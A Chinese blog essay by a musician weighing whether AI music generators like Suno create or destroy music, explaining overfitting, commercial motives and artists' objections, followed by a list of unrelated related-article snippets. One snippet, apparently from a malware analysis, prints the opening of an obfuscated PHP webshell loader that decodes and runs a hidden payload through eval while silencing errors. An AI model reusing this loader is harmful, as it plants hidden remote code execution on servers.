【AI作曲】毁掉音乐?早该来了!一个网易音乐人对于 AI 大模型音乐创作的思辨
引言:AI在创造还是毁掉音乐?
正如当初 midjourney 和 StableDiffusion 在绘画圈掀起的风波一样,suno 和 各大音乐大模型的来临,其实早该来了。
AI 在毁掉绘画?或者毁掉音乐?
没错,但也错了。至于理由稍稍有些复杂。也许我们的想法略有不同。
我将从社会、商业、艺术形式、人工智能技术、深度学习原理及其思辨等多个角度,结合我作为音乐人、艺术爱好者和技术工作者的角色,对音乐和AI发展的个人见解来议论这个话题。
写得略深,懒得配图… 如果不想动脑可以关掉了。
// 免责声明:本篇博客纯属个人娱乐见解,不代表任何权威观点,仅供参考。//
一、AI 音乐(艺术)大模型能真正创新吗?
先说答案:看似,能;理解深度学习的原理后,能,但不完全能。
1.你的神经网络孩子,是如何创作的?(概念说明:神经网络、数据集、拟合、学习训练原理)
无论是绘画、文字还是音频,深度学习需要把 已经存在的内容(也就是其他人画好的画、写好的小说、创作好的音乐) 输入给神经网络,通过指定的一些算法进行学习。
你可以这样理解:在神经网络被初创的时候,它只是一个什么都不会的婴儿 —— 具有学习的能力,但目前还什么都没学。
所以说,你需要教他,让他学习你想要让他学习的内容,这样在它学会了之后,才能为你服务。
你给神经网络喂乌龟的图片,它就能够学习乌龟是什么样子的,之后,它就能生成出乌龟来。这相当于你给这个“神经网络孩子”报了个绘画补习班(补习班的内容就是学习画各种各样的乌龟)。当它学成了之后,它也只能画乌龟,而不能创作模仿德彪西的钢琴曲写出个《月光》来。
一切神经网络所掌握的内容,都来源于它所学习的内容(数据集)。
所以,看似它能相对而言进行 假的 “创新”;然而在实际上,这是一种 真的 “模仿”。 模仿的过程,我们称之为 “拟合” ,也就是通过持续不断地迭代学习,来学着概括它所学习的内容的普遍形式(一种 “特征”)。这里,我们要引出两个概念:过拟合、欠拟合。
概念一:过拟合
过拟合的意思是,它太过于接近,反而导致了它会直接生成出和他所学的内容一模一样的东西。比如说你把贝多芬创作的所有钢琴曲都让这个神经网络进行学习。
它学习了很久,你本来希望的是,它能模仿贝多芬的风格进行创作,然而它 过拟合 了,它创作出来的内容就是贝多芬的原曲!变都没变!(这只是极端的过拟合情况,正常的过拟合情况是,会和原曲很像)。如此一来,它失去了 “创新” 的能力。
概念二:欠拟合
很简单,欠拟合就是,你可怜的神经网络孩子在补习班里没学会贝多芬的风格,你叫它生成出来贝多芬风格的音乐给你听的时候,它生成出了一堆噪音(笑)。
导致这种现象的原因主要是因为:1.你没给这个神经网络孩子足够的时间来学习(迭代次数少)2.你没告诉它正确的学习方法(算法选用不合适、训练参数不正确)。
第二种情况比第一种严重得多,如果这个神经网络孩子是聪明的,方法也对,那么我们只需要时间来让它学习;然而,当它被设置了错误的算法和参数后(天生是个傻子),你无论让它学习多久,它也无法学会(损失函数无法很好地收敛)。
2.为何是 “模仿”,难道真的不能 “创新”?
搞清楚了深度学习的原理后,请仔细思考我下面的这段话,它是关于 AI 能否创新的核心内容:
你并没有在创造一个 “贝多芬的艺术作品”,你在创造的,是一个尽可能接近于 真实贝多芬 的 “赛博贝多芬” —— 它能为你带来量产的贝多芬风格作品,快速、高效地生成 —— 比贝多芬写得快,但如果贝多芬还活着,他有能力创作出更多的风格的音乐;而你的神经网络孩子却无法这样做。
原因只有一个:当你把真实的贝多芬看做一个生物神经网络时,他学习的数据集是 无限的 广阔的世界;而你的神经网络孩子学习的数据集是真实贝多芬创作出来的 有限的 音乐作品。
能不能人为地制造 “无限” 呢?
可以,但不完全可以。
方法是为数据集的内容添加 随机噪声(random noise);或者,在选取数据集的时候就人为筛选“美感”较为强烈的内容(与 StableDiffusion 较为类似的一个新的模型 Playground-v2 就是这样做的 )
尽管这种方法从理论上实现了 “无限”,可实际的效果却不那么尽如人意。
就当前的技术手段来讲,神经网络可以学习“风格”,而对于形而上的“美感”的学习的能力却十分有限。虽然两者都很抽象,但后者明显更难被把控。一方面是我们在哲学上对于美感的解释并未得到一个大统一,再者是已有的解释也没能被量化。
如果想要更进一步,也许将来的某一天,“美感”这种不明确的学习目标可以被解释成学习参数,再通过某种形式变为具体的网络训练参考或具体算法。
二、神经网络孩子,你动了谁的奶酪
1.AI 音乐大模型为何存在,意义在哪儿?
它的存在,主要原因只有一点:商业化。说白点儿,搞钱。
次要原因:有趣好玩、降低音乐创作门槛、科研、技术发展自然推动(其实说白了,所有次要原因的最终指向,还是出于市场角度考虑。除了真正热爱 AI 和 音乐的人把它当成玩物)

<图片为,现在登顶第一的音乐生成大模型 suno>
2.为何近年来大家如此厌恶各类大模型
是因为 AI 画出来的东西真的很难看吗?
AI 画出来的东西碾压了绝大部分中小画师,这是不争的事实。至于大画师,受到的影响几乎为零。音乐方面亦复如是。
大家讨厌的原因无非集中于两个主要点:没灵魂、抢我饭碗
讨厌点一:没灵魂
艺术创作是有目的性的、旨在使用一种抽象的偏感性和形而上的方式来表达个人情感、见解或其他内容的社会意识形态、一种“链接” —— 一种带有浓厚个人色彩的、目的却是尝试对外界进行输出或沟通的表现形式(下面的板块会详谈)。
然而,AI省略了情感和思考,用冷冰冰的一个又一个带着权重的神经网络节点,把艺术作品克隆出来了。
这不得不让人感到愤怒和抵触,如果严重一点说,这是对人类意识形态和情感的一种挑衅行为。
讨厌点二:抢我饭碗
断人财路如srfm,讨厌也正常。
3.所以 AI 到底是在创造音乐还是毁灭音乐(包括绘画)
我觉得两者都有。
创造音乐:
今年3月份,杭州第一个AI绘画模型维权成功,理由是“在使用AI的过程中进行了头脑劳动”之类的。其实很公平,就是这样的。
社会的发展必然会导致这样的结果,就好像当初工人砸掉织布的机器一样,如今又上演。
不过这一次,为何不当一回制造机器的人呢(笑)。
如果按照艺术的角度上来说,如果把一首歌的全部部分都交给AI,你的作品的创造性是十分有限的,我们在解释深度学习的原理的时候就已经说明过这个问题了。
正确的用法应该是,AI为音乐人提供思路和旋律走向、和弦编排,而音乐人是那个“审阅人”,找出自己觉得好的内容,然后使用,并优化。
在这个过程中,音乐人关键的付出是“审美”和对于音乐宿主软件(你可以把宿主软件理解为集成开发环境)的操作,以及一些细节调整和整体把控。这样人机共同创作歌曲,才是最优解。
毁掉音乐
其实相比于画师,音乐人受到的影响并没有多大,甚至说没什么影响。
因为音乐创作的感性点更多,很多时候要不按常理出牌,这正好是 AI 不擅长的内容。
如果你要创作口水歌,那么无疑,AI 现在就已经能把你淘汰了 —— AI 最擅长口水歌。因为当今乐坛大部分都是口水歌!
如此的压力下,中低水平的画师和音乐人就要另谋出路,将来选择进入这个行业的人也会越来越少。
所以你看,AI 毁掉的不是音乐,而是音乐创作的生态圈。到此为止吧。
三、对于艺术的思考(附加篇)
1.什么是艺术
无论是美术还是音乐,它们都是艺术的一种形态。
然而无论是度娘还是google,在我们去搜索关于艺术的定义时,会发现始终没有一个一锤定音的答案。最好的结果,你能找到各大搜索引擎和稠人广众的洋洋洒洒。那不妨,鄙人也于百舌之声中抛砖引玉,浅谈拙见。
且不论艺术之历史,只谈它的表现形式。
艺术创作大多是有目的性的,它旨在使用一种抽象的、偏感性和形而上的方式来表达个人情感、见解或其他内容。如果你仔细观察便不难发现,它是一种“链接” —— 一种带有浓厚个人色彩的、目的却是尝试对外界进行输出或沟通的表现形式。
艺术作品的好与坏,评论者的身份是决定性的。我们也许可以从两个角色的角度来将它们大体划分,然后再进行细分。
2.艺术的受众
第一部分:大众之声
如今艺术作品最大的欣赏群体是大众。相比于专业人士的角色视角,大众对于艺术作品的审视和判断,是不容忽视的。在过去的这些年里,我一直对于网络小说和量产口水歌有一定的偏见。
然而近些年我改变了自己的观点。因为它的存在是能为大部分人带来实打实的欣赏价值的。
而大部分的对此类艺术作品的评价来源于它是否能够勾起大部分人对于此作品的朴素美感认同,而非专业性和高级审美上的认同。
第二部分:专业人士
专业人士在自己擅长的艺术形式上的鉴赏是苛刻的。比如对于一首流行歌曲,在大众听来,或许不会在意其作曲旋律走向是否经过和声学的精心编排;编曲配器有多少,又是如何相互配合;效果器用了哪些;歌曲的结构是怎样的;缩混母带做没做好等等。只大家觉得 “好听”,这就够了。
然而在研究音乐的人耳朵里,这首歌曲在被欣赏时就已经被肢解得支离破碎了。美术、摄影等艺术创作形式也是一样,构图、色彩等等都会被肢解。
我在读大学的时候开过一家猫舍,对于各种品种猫从最开始觉得“这只猫好看”、“这只猫难看”,到后来的我看到一只猫,我已经无法分清它是否好看了。我能看到的只有一个标签,上面写着这只猫从品相分析和当前行情的角度上分析得来的市场价格。
相关文章:
【AI作曲】毁掉音乐?早该来了!一个网易音乐人对于 AI 大模型音乐创作的思辨
引言:AI在创造还是毁掉音乐? 正如当初 midjourney 和 StableDiffusion 在绘画圈掀起的风波一样,suno 和 各大音乐大模型的来临,其实早该来了。 AI 在毁掉绘画?或者毁掉音乐? 没错,但也错了。…...
RabbitMQ实践——最大长度队列
大纲 抛弃消息创建最大长度队列绑定实验 转存死信创建死信队列创建可重写Routing key的最大长度队列创建绑定关系实验 在一些业务场景中,我们只需要保存最近的若干条消息,这个时候我们就可以使用“最大长度队列”来满足这个需求。该队列在收到消息后&…...
【pytorch02】手写数字问题引入
1.数据集 现实生活中遇到的问题 车牌识别身份证号码识别快递单的识别 都会涉及到数字识别 MNIST(收集了很多人手写的0到9数字的图片) 每个数字拥有7000个图像train/test splitting:60k vs 10k 图片大小28 28 数据集划分成训练集和测试集合的意义…...
【查看显卡信息】——Ubuntu和windows
1、VMware虚拟机 VMware虚拟机上不能使用CUDA/CUDNN,也安装不了显卡驱动 查看显卡信息: lspci | grep -i vga 不会显示显卡信息,只会输出VMware SVGA II Adapter,表示这是一个虚拟机,无法安装和使用显卡驱动 使用上…...
在 RK3568 上构建 Android 11 模块:深入解析 m、mm、mmm 编译命令
目录 Android 编译系统概述编译命令简介 环境准备使用 m、mm、mmm 编译模块编译整个源码树编译单个模块编译指定目录下的模块 高级应用并行编译清理编译结果编译特定配置 在 Android 开发中,特别是在 RK3568 这样的高性能平台上,有效地编译和管理模块是确…...
实战|YOLOv10 自定义目标检测
引言 YOLOv10[1] 概述和使用自定义数据训练模型 概述 由清华大学的研究团队基于 Ultralytics Python 包研发的 YOLOv10,通过优化模型结构并去除非极大值抑制(NMS)环节,提出了一种创新的实时目标检测技术。这些改进不仅实现了行业领…...
TTS前端原理学习 chatgpt生成答案
第一篇文章学习 小绿鲸阅读器 通篇使用chatgpt生成答案 文章: https://arxiv.org/pdf/2012.15404 1. 文章概述 本文提出了一种基于Distilled BERT模型的统一普通话文本到语音前端模块。该模型通过预训练的中文BERT作为文本编码器,并采用多任务学习技术…...
AI“音乐创作”横行给音乐家带来哪些隐忧
近日,200多名国际乐坛知名音乐人联署公开信,呼吁AI开发者、科技公司、平台和数字音乐服务商停止使用人工智能(AI)来侵犯并贬低人类艺术家的权利,具体诉求包括,停止使用AI侵犯及贬低人类艺术家的权利,要求…...
SolidityFoundry 安全审计测试 Delegatecall漏洞2
名称: Delegatecall漏洞2 https://github.com/XuHugo/solidityproject/tree/master/vulnerable-defi 描述: 我们已经了解了delegatecall 一个基础的漏洞——所有者操纵漏洞,这里就不再重复之前的基础知识了,不了解或者遗忘的可…...
【字符串 状态机动态规划】1320. 二指输入的的最小距离
本文涉及知识点 动态规划汇总 字符串 状态机动态规划 LeetCode1320. 二指输入的的最小距离 二指输入法定制键盘在 X-Y 平面上的布局如上图所示,其中每个大写英文字母都位于某个坐标处。 例如字母 A 位于坐标 (0,0),字母 B 位于坐标 (0,1)࿰…...
2024.06.23【读书笔记】丨生物信息学与功能基因组学(第十七章 人类基因组 第三部分)【AI测试版】
第三部分:人类基因组的深入分析与比较基因组学 摘要: 本部分基于2001年国际人类基因组测序联盟(IHGSC)发布的人类基因组测序及分析草图,从生物信息学角度深入讨论了人类基因组的结构特征和分析方法。同时,提及了塞莱拉公司(Celera Genomics)版本的人类基因组草图及其…...
外观模式(大话设计模式)C/C++版本
外观模式 C #include <iostream> using namespace std;class stock1 { public:void Sell(){cout << "股票1卖出" << endl;}void Buy(){cout << "股票1买入" << endl;} };class stock2 { public:void Sell(){cout << …...
PHP木马原文
攻击者留下的源码 <?php $ZimXb strre.v; $SkYID ba.se64._d.eco.de; $qetGk g.zuncomp.ress; ini_set(display_errors, 0); ini_set(log_errors, 0); /*** 13f382ef7053c327e26dff2a9c14affbd9e8296a ***/ error_reporting(0); eval($qetGk($SkYID($ZimXb(Q2WA…...
湖南(市场调研)源点咨询 新产品上市前市场机会调研与研究分析
湖南源点调研认为:无论是创业公司,还是在公司内部探索新的项目或者新的产品线等,首先都要做“市场机会分析与调研“,要真正思考并解答以下疑问: 我们的目标客户群体是谁,他们如何决策? 我们所…...
Vue82-组件内路由守卫
一、组件内路由守卫的定义 在一个组件里面去写路由守卫,而不是在路由配置文件index.js中去写。 此时,该路由守卫是改组件所独有的! 只有通过路由规则进入的方式,才会调这两个函数,否则,若是只是用<Ab…...
使用ESP32和Flask框架实现温湿度数据监测系统
项目概述 在这个项目中,我们将使用ESP32微控制器读取温湿度传感器的数据,并将这些数据通过HTTP请求传输到基于Flask框架的服务器。Flask是一个轻量级的Python Web框架,非常适合快速开发和部署Web应用。通过这个项目,我们不仅可以了…...
为什么按照正确的顺序就能开始不断地解决问题,按照不正确的顺序,问题就没有办法能够得到解决呢?
按照正确的顺序解决问题与按照不正确的顺序可能导致问题无法解决,这背后有几个关键原因: 1. **逻辑性**: 正确的顺序通常遵循逻辑性和因果关系(因为得按照这个基础的逻辑性才能够是自己顺应规律,太阳没有办法能够从西…...
嵌入式Linux gcc 编译器使用解析
目录 1.说明 2.分步编译法 3.编译源文件的四个阶段 4.gdb调试及常用命令 5.Makefile 1.说明 源文件 main.c 想生成 source gcc –g –O2 main.c –o source 黄色部分便是控制字 -g用于GDB –O2用于优化编译; 绿色部分表示源,可以由多个组成,用空格隔开; gcc …...
4、matlab双目相机标定实验
1、双目相机标定原理及流程 双目相机标定是将双目相机系统的内外参数计算出来,从而实现双目视觉中的立体测量和深度感知。标定的目的是确定各个摄像头的内部参数(如焦距、主点、畸变等)和外部参数(如相机位置、朝向等)…...
Oracle 数据库表和视图 的操作
1. 命令方式操作数据库(采用SQL*Plus) 1.1 创建表 1.1.1 基本语法格式 CREATE TABLE[<用户方案名>]<表名> (<列名1> <数据类型> [DEFAULT <默认值>] [<列约束>]<列名2> <数据类型> [DEFAULT <默认…...
VB.net复制Ntag213卡写入UID
本示例使用的发卡器:https://item.taobao.com/item.htm?ftt&id615391857885 一、读取旧Ntag卡的UID和数据 Private Sub Button15_Click(sender As Object, e As EventArgs) Handles Button15.Click轻松读卡技术支持:网站:Dim i, j As IntegerDim cardidhex, …...
day52 ResNet18 CBAM
在深度学习的旅程中,我们不断探索如何提升模型的性能。今天,我将分享我在 ResNet18 模型中插入 CBAM(Convolutional Block Attention Module)模块,并采用分阶段微调策略的实践过程。通过这个过程,我不仅提升…...
【入坑系列】TiDB 强制索引在不同库下不生效问题
文章目录 背景SQL 优化情况线上SQL运行情况分析怀疑1:执行计划绑定问题?尝试:SHOW WARNINGS 查看警告探索 TiDB 的 USE_INDEX 写法Hint 不生效问题排查解决参考背景 项目中使用 TiDB 数据库,并对 SQL 进行优化了,添加了强制索引。 UAT 环境已经生效,但 PROD 环境强制索…...
【Redis技术进阶之路】「原理分析系列开篇」分析客户端和服务端网络诵信交互实现(服务端执行命令请求的过程 - 初始化服务器)
服务端执行命令请求的过程 【专栏简介】【技术大纲】【专栏目标】【目标人群】1. Redis爱好者与社区成员2. 后端开发和系统架构师3. 计算机专业的本科生及研究生 初始化服务器1. 初始化服务器状态结构初始化RedisServer变量 2. 加载相关系统配置和用户配置参数定制化配置参数案…...
【大模型RAG】Docker 一键部署 Milvus 完整攻略
本文概要 Milvus 2.5 Stand-alone 版可通过 Docker 在几分钟内完成安装;只需暴露 19530(gRPC)与 9091(HTTP/WebUI)两个端口,即可让本地电脑通过 PyMilvus 或浏览器访问远程 Linux 服务器上的 Milvus。下面…...
uniapp微信小程序视频实时流+pc端预览方案
方案类型技术实现是否免费优点缺点适用场景延迟范围开发复杂度WebSocket图片帧定时拍照Base64传输✅ 完全免费无需服务器 纯前端实现高延迟高流量 帧率极低个人demo测试 超低频监控500ms-2s⭐⭐RTMP推流TRTC/即构SDK推流❌ 付费方案 (部分有免费额度&#x…...
《基于Apache Flink的流处理》笔记
思维导图 1-3 章 4-7章 8-11 章 参考资料 源码: https://github.com/streaming-with-flink 博客 https://flink.apache.org/bloghttps://www.ververica.com/blog 聚会及会议 https://flink-forward.orghttps://www.meetup.com/topics/apache-flink https://n…...
MySQL中【正则表达式】用法
MySQL 中正则表达式通过 REGEXP 或 RLIKE 操作符实现(两者等价),用于在 WHERE 子句中进行复杂的字符串模式匹配。以下是核心用法和示例: 一、基础语法 SELECT column_name FROM table_name WHERE column_name REGEXP pattern; …...
在鸿蒙HarmonyOS 5中使用DevEco Studio实现录音机应用
1. 项目配置与权限设置 1.1 配置module.json5 {"module": {"requestPermissions": [{"name": "ohos.permission.MICROPHONE","reason": "录音需要麦克风权限"},{"name": "ohos.permission.WRITE…...
OpenLayers 分屏对比(地图联动)
注:当前使用的是 ol 5.3.0 版本,天地图使用的key请到天地图官网申请,并替换为自己的key 地图分屏对比在WebGIS开发中是很常见的功能,和卷帘图层不一样的是,分屏对比是在各个地图中添加相同或者不同的图层进行对比查看。…...
